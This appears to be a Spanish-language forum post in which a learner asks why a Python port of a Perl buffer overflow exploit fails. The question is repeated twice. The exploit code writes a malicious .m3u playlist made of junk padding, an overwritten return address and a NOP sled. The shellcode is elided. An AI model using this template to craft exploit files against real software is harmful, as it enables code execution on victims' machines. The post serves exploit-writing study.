Buen día,
he estado aprendiendo sobre programar/escribir exploits de una pagina muy buena a mi parecer. la cuestion es que los ejemplos estan escritos en perl y yo quisiera utilizar python para hacer los exploits.
mi problema es al tratar de traducir la funcion pack de perl a python. en perl es muy facil:
my $eip = pack('V',0x7E429353);
lo mas parecido que encontre en python es:
from struct import pack
eip = pack('<L',0x7E429353)
incluso estuve viendo codigo de otros explots en este lenguaje y asi es como lo hacen.
la cosa es que no funciona :S, estoy utilizando python v2.7 (intente con la 3.2 pero tampoco)
aqui dejo el codigo del explot de prueba que utilizo, en perl y python (perl si me funciona)
PERL
Python
será que no funciona por algo del codigo? segun yo, los 2 deberian de funcionar igual
si necesitan mas informacion puedo proporcionarla, nadamas pregunten
Gracias por su ayuda
he estado aprendiendo sobre programar/escribir exploits de una pagina muy buena a mi parecer. la cuestion es que los ejemplos estan escritos en perl y yo quisiera utilizar python para hacer los exploits.
mi problema es al tratar de traducir la funcion pack de perl a python. en perl es muy facil:
my $eip = pack('V',0x7E429353);
lo mas parecido que encontre en python es:
from struct import pack
eip = pack('<L',0x7E429353)
incluso estuve viendo codigo de otros explots en este lenguaje y asi es como lo hacen.
la cosa es que no funciona :S, estoy utilizando python v2.7 (intente con la 3.2 pero tampoco)
aqui dejo el codigo del explot de prueba que utilizo, en perl y python (perl si me funciona)
PERL
Código [Seleccionar]
my $file= "test1perlFinal.m3u";
my $junk= "A" x 26049;
my $eip = pack('V',0x7E429353);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\xdb\xc0 .... \x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
Python
Código [Seleccionar]
from struct import pack
filename = "test1.m3u"
junk = "\x41" * 26049
eip = pack('<L',0x7E429353)
espdata = "\x90" * 25
payload = "\xdb\xc0\ .... \xca"
FILE = open(filename,"wb")
FILE.write(junk+eip+espdata)
FILE.close()
será que no funciona por algo del codigo? segun yo, los 2 deberian de funcionar igual
si necesitan mas informacion puedo proporcionarla, nadamas pregunten
Gracias por su ayuda